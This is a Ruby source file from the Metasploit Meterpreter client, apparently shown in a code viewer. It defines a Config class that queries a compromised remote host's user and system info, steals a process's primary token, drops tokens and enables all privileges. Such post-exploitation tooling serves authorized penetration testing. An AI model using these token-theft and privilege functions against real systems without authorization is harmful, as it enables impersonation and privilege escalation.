99 lines
2.2 KiB
Ruby
99 lines
2.2 KiB
Ruby
#!/usr/bin/env ruby
|
|
# -*- coding: binary -*-
|
|
|
|
require 'rex/post/process'
|
|
require 'rex/post/meterpreter/packet'
|
|
require 'rex/post/meterpreter/client'
|
|
require 'rex/post/meterpreter/extensions/stdapi/constants'
|
|
require 'rex/post/meterpreter/extensions/stdapi/stdapi'
|
|
|
|
module Rex
|
|
module Post
|
|
module Meterpreter
|
|
module Extensions
|
|
module Stdapi
|
|
module Sys
|
|
|
|
###
|
|
#
|
|
# This class provides access to remote system configuration and information.
|
|
#
|
|
###
|
|
class Config
|
|
|
|
def initialize(client)
|
|
self.client = client
|
|
end
|
|
|
|
#
|
|
# Returns the username that the remote side is running as.
|
|
#
|
|
def getuid
|
|
request = Packet.create_request('stdapi_sys_config_getuid')
|
|
response = client.send_request(request)
|
|
return client.unicode_filter_encode( response.get_tlv_value(TLV_TYPE_USER_NAME) )
|
|
end
|
|
|
|
#
|
|
# Returns a hash of information about the remote computer.
|
|
#
|
|
def sysinfo
|
|
request = Packet.create_request('stdapi_sys_config_sysinfo')
|
|
response = client.send_request(request)
|
|
|
|
{
|
|
'Computer' => response.get_tlv_value(TLV_TYPE_COMPUTER_NAME),
|
|
'OS' => response.get_tlv_value(TLV_TYPE_OS_NAME),
|
|
'Architecture' => response.get_tlv_value(TLV_TYPE_ARCHITECTURE),
|
|
'System Language' => response.get_tlv_value(TLV_TYPE_LANG_SYSTEM),
|
|
}
|
|
end
|
|
|
|
#
|
|
# Calls RevertToSelf on the remote machine.
|
|
#
|
|
def revert_to_self
|
|
client.send_request(Packet.create_request('stdapi_sys_config_rev2self'))
|
|
end
|
|
|
|
#
|
|
# Steals the primary token from a target process
|
|
#
|
|
def steal_token(pid)
|
|
req = Packet.create_request('stdapi_sys_config_steal_token')
|
|
req.add_tlv(TLV_TYPE_PID, pid.to_i)
|
|
res = client.send_request(req)
|
|
return client.unicode_filter_encode( res.get_tlv_value(TLV_TYPE_USER_NAME) )
|
|
end
|
|
|
|
#
|
|
# Drops any assumed token
|
|
#
|
|
def drop_token
|
|
req = Packet.create_request('stdapi_sys_config_drop_token')
|
|
res = client.send_request(req)
|
|
return client.unicode_filter_encode( res.get_tlv_value(TLV_TYPE_USER_NAME) )
|
|
end
|
|
|
|
#
|
|
# Enables all possible privileges
|
|
#
|
|
def getprivs
|
|
req = Packet.create_request('stdapi_sys_config_getprivs')
|
|
ret = []
|
|
res = client.send_request(req)
|
|
res.each(TLV_TYPE_PRIVILEGE) do |p|
|
|
ret << p.value
|
|
end
|
|
return ret
|
|
end
|
|
|
|
protected
|
|
|
|
attr_accessor :client
|
|
|
|
end
|
|
|
|
end; end; end; end; end; end
|
|
|